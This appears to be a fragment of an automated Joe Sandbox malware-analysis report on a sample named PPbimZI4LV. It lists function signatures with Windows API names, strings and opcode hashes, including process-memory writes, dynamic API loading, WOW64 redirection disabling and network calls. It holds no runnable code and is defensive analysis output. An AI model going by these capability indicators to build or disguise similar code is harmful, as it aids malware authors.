                                                                      • Instruction Fuzzy Hash: 3B61953290D24286E769BF25884637C37A0EB25B08F141235C6EAE11DBFF69E481E740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID: !$acos
                                                                      • API String ID: 1156100317-2870037509
                                                                      • Opcode ID: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                      • Instruction ID: 9498bc5a642675b29b5882556e41e74659adcadd5cee48c5efa6280f05469c5d
                                                                      • Opcode Fuzzy Hash: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                      • Instruction Fuzzy Hash: 0661BA22D2CF4585E223BB3458133769754BFA63D1F119336E95EF5A66EF2CE0829B00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID: !$asin
                                                                      • API String ID: 1156100317-2188059690
                                                                      • Opcode ID: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                      • Instruction ID: c04491aec1e753e1e5df679998230794a66642e84de864d8ad2b304f06e6f7a5
                                                                      • Opcode Fuzzy Hash: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                      • Instruction Fuzzy Hash: 02618522D2CF8185E653BF3458133769755AFA63D1F109332E95EF5A66EF2CA0829A00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                      • String ID: @
                                                                      • API String ID: 4150878124-2766056989
                                                                      • Opcode ID: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                                      • Instruction ID: a6b7b48e9ed5ad677ae4048cbfd81a4e41c615c54399590b32e1c4f9ff91567b
                                                                      • Opcode Fuzzy Hash: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                                      • Instruction Fuzzy Hash: 10519F76A1C68196D720FF52E4869AAB760FBC8B84F451035EE4DA3B4AEE7CD505CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Delete$InfoItem
                                                                      • String ID: P
                                                                      • API String ID: 135850232-3110715001
                                                                      • Opcode ID: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                      • Instruction ID: f92aa84c6ba80cc2553f09abb7fb2df0c318b496d75a330bcb32ab4a8736a6eb
                                                                      • Opcode Fuzzy Hash: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                      • Instruction Fuzzy Hash: B9418F32A08A81CAEB60FF19C4463A96765EF84B60F168231DA6DD77D2EF38D542D700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                      • String ID: U
                                                                      • API String ID: 2456169464-4171548499
                                                                      • Opcode ID: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                      • Instruction ID: 98968892c5482d6f4827681c9a1824d85d4e1767d9418b496265f5b6babcc982
                                                                      • Opcode Fuzzy Hash: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                      • Instruction Fuzzy Hash: F041B322A1D64282DB60AF15E4463AAB7A1FB88795F404131EE4ED7789EF7CD441D740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID: SysTreeView32
                                                                      • API String ID: 847901565-1698111956
                                                                      • Opcode ID: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                      • Instruction ID: 8ffc300297a9b7e9311524e00eecbf8b61463752cda13a4f78f625362c989244
                                                                      • Opcode Fuzzy Hash: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                      • Instruction Fuzzy Hash: CF414C32A097D286E770AF28A445B9A77A1F784760F144335DAA893A9ADF3CD845CF40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateObjectStock
                                                                      • String ID: SysMonthCal32
                                                                      • API String ID: 2671490118-1439706946
                                                                      • Opcode ID: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                                      • Instruction ID: 4cebd3d85aa41ff106b4afb96dce9add417da55e6d83ac4ff4f0cbab529c300d
                                                                      • Opcode Fuzzy Hash: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                                      • Instruction Fuzzy Hash: 434180326086C2C7E370EF55E445B5AB7A0F788790F104235EA9993A99DF3CD4858F00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                      • String ID: msctls_updown32
                                                                      • API String ID: 1752125012-2298589950
                                                                      • Opcode ID: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                      • Instruction ID: e30ee7b653bc1f3e5f5e8714b069c873fc0c8fe2b1d64a5e89428b171c22a1a6
                                                                      • Opcode Fuzzy Hash: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                      • Instruction Fuzzy Hash: 0131C032A1CB8286EB60EF25E4413AA7361FBC5B91F108136DA8D93B59DF3CD444CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateMoveObjectStock
                                                                      • String ID: Listbox
                                                                      • API String ID: 3747482310-2633736733
                                                                      • Opcode ID: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                      • Instruction ID: b51039e0ea793375488e90fdaa65be78f6c55057c44369cd42b2638d494d4f86
                                                                      • Opcode Fuzzy Hash: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                      • Instruction Fuzzy Hash: 35317A326087C186E770EF16B445A5AB7A1F7887A0F504225EEA953B99DF3DD481CF00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume
                                                                      • String ID: %lu
                                                                      • API String ID: 2507767853-685833217
                                                                      • Opcode ID: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                      • Instruction ID: 1459813af8c084c52d42ef6a25192e07835a1d9e9574375894b59cb7110c7c71
                                                                      • Opcode Fuzzy Hash: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                      • Instruction Fuzzy Hash: 72316D7260CB8685EA10FB16E4421ADB761FB89B84F504031EA8DD3B66EF78D595DB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: msctls_trackbar32
                                                                      • API String ID: 1025951953-1010561917
                                                                      • Opcode ID: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                      • Instruction ID: 80d5dca022631aca6bfec43bd8e85572546e69b5f020fdb2419ca26c35912f2b
                                                                      • Opcode Fuzzy Hash: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                      • Instruction Fuzzy Hash: 1D314A32A0868187E760EF55E445B5AB7A1FB88B90F104239EB9993B59DF3CD841CF04
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                                      • String ID: %s%d
                                                                      • API String ID: 2330185562-1110647743
                                                                      • Opcode ID: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                      • Instruction ID: 1291a6ec1f1119788207eb23a1b2be5592d3e12de31212630bd32381fa4357af
                                                                      • Opcode Fuzzy Hash: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                      • Instruction Fuzzy Hash: 86217F2160CB8291EA18FF21E4422FA6351BB89BC0F545132DE9EE7757EF2CE105D700
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                      • String ID: csm
                                                                      • API String ID: 2280078643-1018135373
                                                                      • Opcode ID: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                      • Instruction ID: bd4d21383fe66d9a5ab1267d586a7dc3109973e1a5413f6f08f2f5925f7ebf0c
                                                                      • Opcode Fuzzy Hash: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                      • Instruction Fuzzy Hash: B921717660C64182E630FF16E04126E77A0F798BA0F400235DEAD93B96DF3DE886DB00
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF643982DD1), ref: 00007FF6439BAF37
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF643982DD1), ref: 00007FF6439BAF4F
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                      • API String ID: 2574300362-1816364905
                                                                      • Opcode ID: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                      • Instruction ID: c9edebf027817ddfcf484ef59f7e0458ebbffeb901a452a4887f765571e5bd68
                                                                      • Opcode Fuzzy Hash: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                      • Instruction Fuzzy Hash: B7F01C61A09B0282FF08BB50E84636863E4FF18B19F940435C91CD6361FF7CD558E300
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                      • API String ID: 2574300362-4033151799
                                                                      • Opcode ID: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                      • Instruction ID: 5ce5ab07848b997bc56aab44f9de4e3f07084680424da8ff376b57abaffd2d4b
                                                                      • Opcode Fuzzy Hash: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                      • Instruction Fuzzy Hash: 0DE0C921E0DB0682EF14BB50A41637823A1EB08B55F840435D91DD5351FF7CD595E740
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 2574300362-3689287502
                                                                      • Opcode ID: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                      • Instruction ID: 1526da5b51ae968fe22009652f41ce7aa21d2e13cbe0de88b75aa16c951f970b
                                                                      • Opcode Fuzzy Hash: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                      • Instruction Fuzzy Hash: B7E0ED2290AF0682FF14BB51E8163A823E4FB08B48F540835D91DE5391FFBCE594D740
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                      • API String ID: 2574300362-199464113
                                                                      • Opcode ID: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                      • Instruction ID: 9f1b39e62180f5a99c8aeb58fd3619af9416767151569ed187c86e062eb84570
                                                                      • Opcode Fuzzy Hash: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                      • Instruction Fuzzy Hash: 36E0ED21919B06C2EF14BB54E81676823E0FF08B48F840535D91DD5355FF7CD998E700
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                      • API String ID: 2574300362-192647395
                                                                      • Opcode ID: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                      • Instruction ID: 45dcf023d498c5e0df715346cb009617170b86ede06839c94600cfda282238b8
                                                                      • Opcode Fuzzy Hash: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                      • Instruction Fuzzy Hash: 02E0C26190AB02C2EB54BF61A45736823A0BB08B88F880435C92DD63A5FFBCD6A4D700
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                      • Instruction ID: 2e3b19d5d2dbfb77ff3e17f2e4b99af3d1227f38148ad89dd48e98eec1f0bd5f
                                                                      • Opcode Fuzzy Hash: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                      • Instruction Fuzzy Hash: 50D13776B18B56C6EB18AF2AC4512AC37B0FB88F88B154422DF4D97B59EF39D845D300
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Window$ClientMessageMoveRectScreenSend
                                                                      • String ID:
                                                                      • API String ID: 1249313431-0
                                                                      • Opcode ID: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                      • Instruction ID: 698f0f6a3f4bab1861388fca246aafd9d2cc17f967febe5886d717c70d848727
                                                                      • Opcode Fuzzy Hash: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                      • Instruction Fuzzy Hash: D351E636A09A4289EB50FF25D4816BD3761FB44B98F544136DE2DE3795EF38E881E700
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ErrorLast$socket
                                                                      • String ID:
                                                                      • API String ID: 1881357543-0
                                                                      • Opcode ID: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                      • Instruction ID: dfe1557d1cdc71a174102c7581a8aa5d2383f836b74bbb33f0d06b97fcdd587e
                                                                      • Opcode Fuzzy Hash: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                      • Instruction Fuzzy Hash: 4D41B06170C68286EB14BF16E5026AD6791BB89FE0F444534DE2EEBBA7DF3CD0019B40
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1352109105-0
                                                                      • Opcode ID: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                      • Instruction ID: 9493efecd0c94f6efecb6b47c1146891ef4c1e4c9210c4d55501a550a8d21d83
                                                                      • Opcode Fuzzy Hash: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                      • Instruction Fuzzy Hash: 6E417F32A0CA5685EE50FF19D88667A37A0FB84B94F154135CA5FE33A1EF38E8459700
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                      • String ID:
                                                                      • API String ID: 3076010158-0
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                      • String ID:
                                                                      • API String ID: 4141327611-0
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      Similarity
                                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                                      • String ID:
                                                                      • API String ID: 3340791633-0
                                                                      Similarity
                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 1463438336-0
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID:
                                                                      • API String ID: 847901565-0
                                                                      Similarity
                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                      • String ID:
                                                                      • API String ID: 2864067406-0
                                                                      Similarity
                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                      • String ID: cdecl
                                                                      • API String ID: 4031866154-3896280584
                                                                      Similarity
                                                                      • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                                      • String ID:
                                                                      • API String ID: 837644225-0
                                                                      APIs
                                                                        • Part of subcall function 00007FF643922A54: GetWindowLongPtrW.USER32 ref: 00007FF643922A71
                                                                      • GetClientRect.USER32(?,?,?,?,?,00007FF64396AA36,?,?,?,?,?,?,?,?,?,00007FF6439227AF), ref: 00007FF6439D22C4
                                                                      • GetCursorPos.USER32(?,?,?,?,?,00007FF64396AA36,?,?,?,?,?,?,?,?,?,00007FF6439227AF), ref: 00007FF6439D22CF
                                                                      • ScreenToClient.USER32 ref: 00007FF6439D22DD
                                                                      • DefDlgProcW.USER32(?,?,?,?,?,00007FF64396AA36,?,?,?,?,?,?,?,?,?,00007FF6439227AF), ref: 00007FF6439D231F
                                                                        • Part of subcall function 00007FF6439CE894: LoadCursorW.USER32 ref: 00007FF6439CE945
                                                                      Similarity
                                                                      • API ID: ClientCursor$LoadLongProcRectScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1626762757-0
                                                                      Similarity
                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                      • String ID:
                                                                      • API String ID: 3970641297-0
                                                                      Similarity
                                                                      • API ID: _ctrlfp
                                                                      • String ID:
                                                                      • API String ID: 697997973-0
                                                                      Similarity
                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 2979156933-0
                                                                      • Opcode ID: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                      • Instruction ID: bf526d7d02a7df9ae144f95b9838b612976b26f684d525bd89df2256cab53180
                                                                      • Opcode Fuzzy Hash: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                      • Instruction Fuzzy Hash: 2B21F632A0C7818AE710FF16B8821667A91FB94BD4F444135EA9DD3B56DF3CE0459B40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                      • String ID:
                                                                      • API String ID: 1352324309-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ErrorLast$abort
                                                                      • String ID:
                                                                      • API String ID: 1447195878-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: CounterPerformanceQuerySleep
                                                                      • String ID:
                                                                      • API String ID: 2875609808-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                      • String ID:
                                                                      • API String ID: 1539411459-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                      • String ID:
                                                                      • API String ID: 3974789173-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
